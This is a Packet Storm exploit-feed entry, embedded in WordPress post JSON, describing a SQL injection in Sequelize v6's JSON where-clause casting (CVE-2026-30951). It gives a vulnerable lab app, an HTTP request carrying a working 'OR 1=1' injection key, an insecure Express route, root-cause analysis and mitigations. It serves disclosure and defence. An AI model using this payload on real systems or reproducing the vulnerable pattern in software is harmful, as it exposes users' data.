{“lastseen”:”2026-04-27T16:31:17″,”description”:”A remote SQL injection vulnerability exists Sequelize versions 6.37.7 and below in the JSON\/JSONB where clause processing. When Sequelize parses a JSON path key containing ::, the value after :: is treated as a SQL cast type and is inserted into the…”,”published”:”2026-04-27T00:00:00″,”modified”:”2026-04-27T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Sequelize 6.37.7 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:219872″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-30951″],”sourceData”:”# CVE-2026-30951 Sequelize JSON Cast SQL Injection\\n \\n **\u2605 CVE-2026-30951 Sequelize ORM SQL Injection PoC \u2605**\\n \\n https:\/\/github.com\/user-attachments\/assets\/30b19211-890a-4780-acd9-04856ec98381\\n \\n # Overview\\n \\n \\u003e **CVE-2026-30951** is a **SQL Injection** vulnerability in **Sequelize v6**, a widely used Node.js ORM.\\n \\u003e \\n \\u003e The vulnerability exists in JSON\/JSONB `where` clause processing. When Sequelize parses a JSON path key containing `::`, the value after `::` is treated as a SQL cast type and is inserted into the generated SQL without proper validation.\\n \\u003e \\n \\u003e If an attacker can control JSON object keys passed into a Sequelize `where` clause, they can manipulate the generated SQL query.\\n \\n # Affected Versions\\n \\n | Category | Version |\\n | — | — |\\n | **Vulnerable** | Sequelize **v6.x \\\\\\u003c= 6.37.7** |\\n | **Patched** | Sequelize **6.37.8** |\\n | **Not affected** | Sequelize v7 \/ `@sequelize\/core` |\\n \\n # Impact\\n \\n * SQL injection through attacker-controlled JSON object keys\\n * Search filter bypass through boolean-based injection\\n * Unintended query condition manipulation inside ORM-generated SQL\\n \\n # Environment\\n \\n This repository contains a minimal vulnerable Node.js, Express, Sequelize, and SQLite challenge app.\\n \\n ## Local Run\\n \\n “`\\n npm install\\n npm start\\n “`\\n \\n The app starts on:\\n \\n “`\\n http:\/\/127.0.0.1:9100\\n “`\\n \\n ## Docker\\n \\n “`\\n docker build -t cve-2026-30951-sequelize-vuln .\\n docker run –rm -it -p 9100:9100 –name sequelize-vuln cve-2026-30951-sequelize-vuln\\n “`\\n \\n The Docker container starts on:\\n \\n “`\\n http:\/\/127.0.0.1:9100\\n “`\\n \\n # PoC\\n \\n After starting the vulnerable environment, follow the steps below to reproduce the injection.\\n \\n ## Step 1. Send a normal search request\\n \\n “`\\n POST \/api\/users\/search\\n Content-Type: application\/json\\n \\n {\\n \\”filter\\”: {\\n \\”name\\”: \\”emma\\”\\n }\\n }\\n “`\\n \\n This returns only users matching the normal name search logic.\\n \\n ## Step 2. Trigger a boolean-based SQL injection\\n \\n “`\\n POST \/api\/users\/search\\n Content-Type: application\/json\\n \\n {\\n \\”filter\\”: {\\n \\”name::text) or 1=1–\\”: \\”emma\\”\\n }\\n }\\n “`\\n \\n Expected result:\\n \\n “`\\n All user rows are returned.\\n “`\\n \\n ## Step 3. Confirm that SQL injection occurred\\n \\n The crafted JSON key causes Sequelize to generate a cast expression similar to:\\n \\n “`\\n CAST(json_extract(`User`.`metadata`, ‘$.name’) AS TEXT) OR 1=1–)\\n “`\\n \\n Because the cast type is attacker-controlled, the `OR 1=1` condition changes the intended `WHERE` clause behavior. Returning all rows from the same search endpoint confirms that SQL injection is possible.\\n \\n ## Analysis\\n \\n ### Technical Root Cause\\n \\n The vulnerability is caused by insufficient validation of JSON cast types in Sequelize v6.\\n \\n Internally, Sequelize’s JSON traversal logic splits JSON path keys on `::`:\\n \\n “`\\n jsonKey::castType\\n “`\\n \\n The cast type is then used in generated SQL like:\\n \\n “`\\n CAST(\\u003cjson_extract_expression\\u003e AS \\u003ccast_type\\u003e)\\n “`\\n \\n In vulnerable versions, `\\u003ccast_type\\u003e` is not safely escaped or restricted to a known-safe allowlist. This allows an attacker-controlled JSON key to break out of the cast expression and inject SQL.\\n \\n ### Dangerous Pattern\\n \\n Any application pattern similar to the following may be vulnerable when using affected Sequelize versions:\\n \\n “`\\n app.post(‘\/api\/users\/search’, async (req, res) =\\u003e {\\n const users = await User.findAll({\\n where: {\\n metadata: req.body.filter\\n }\\n });\\n \\n res.json(users);\\n });\\n “`\\n \\n This is dangerous because the attacker controls not only JSON values, but also JSON object keys.\\n \\n ### Why This Matters\\n \\n This vulnerability is especially dangerous because many developers assume ORM query builders automatically protect against SQL injection. In this case, the injection happens inside ORM-generated SQL, after the application has already passed structured JavaScript objects to Sequelize.\\n \\n Depending on the application logic, exploitation may allow:\\n \\n * bypassing intended search filters\\n * altering boolean query conditions\\n * changing the behavior of ORM-generated SQL\\n \\n This is fundamentally a **CWE-89: Improper Neutralization of Special Elements used in an SQL Command** issue.\\n \\n ## Scenario\\n \\n “`\\n +——————————————-+\\n | Attacker |\\n +——————————————-+\\n |\\n | Sends crafted JSON filter\\n | with malicious name:: key\\n v\\n +——————————————-+\\n | POST \/api\/users\/search |\\n +——————————————-+\\n |\\n | Sequelize JSON where clause\\n | processes key containing ::\\n v\\n +——————————————-+\\n | Unescaped SQL cast type injection |\\n +——————————————-+\\n |\\n | Boolean condition manipulation\\n v\\n +——————————————-+\\n | SQL Injection Confirmed |\\n +——————————————-+\\n “`\\n \\n # Mitigation\\n \\n * Upgrade Sequelize to **6.37.8 or later**\\n * Do not pass user-controlled objects directly into Sequelize JSON\/JSONB `where` clauses\\n * Reject or normalize user-controlled JSON keys before building ORM filters\\n * Use whitelist-based filter construction instead of accepting arbitrary request body objects\\n * Reject JSON keys containing SQL control syntax or cast separators such as `::` unless explicitly required\\n * Prefer server-defined query fields, for example:\\n \\n “`\\n const allowedFilters = [‘name’, ‘role’, ‘team’, ‘office’, ‘department’];\\n \\n if (!allowedFilters.includes(req.body.field)) {\\n throw new Error(‘Invalid filter field’);\\n }\\n “`\\n \\n # Disclaimer\\n \\n This repository is intended for security research, defensive validation, and educational use in controlled environments only.\\n \\n Do not use this PoC against systems you do not own or do not have explicit permission to test.\\n \\n # EQST Insight\\n We publish CVE and malware analysis once a month. If you’re interested, please follow the links below to check out our publications.\\n – https:\/\/www.skshieldus.com\/security-insights\/reports?tab=eqst\\n \\n \\n # References\\n \\n * https:\/\/github.com\/sequelize\/sequelize\/security\/advisories\/GHSA-6457-6jrx-69cr\\n * https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-30951\\n * https:\/\/osv.dev\/vulnerability\/CVE-2026-30951\\n * https:\/\/advisories.gitlab.com\/npm\/sequelize\/CVE-2026-30951\/\\n * https:\/\/github.com\/sequelize\/sequelize”,”sourceHref”:”https:\/\/packetstorm.news\/download\/219872″,”cvss”:{“score”:7.5,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:N\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/219872\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-27T16:31:17″,”description”:”A remote SQL injection vulnerability exists Sequelize versions 6.37.7 and below in the JSON\/JSONB where clause processing. When Sequelize parses a JSON path key containing…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,16,12,15,13,53,7,11,5],"class_list":["post-49712","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-75","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n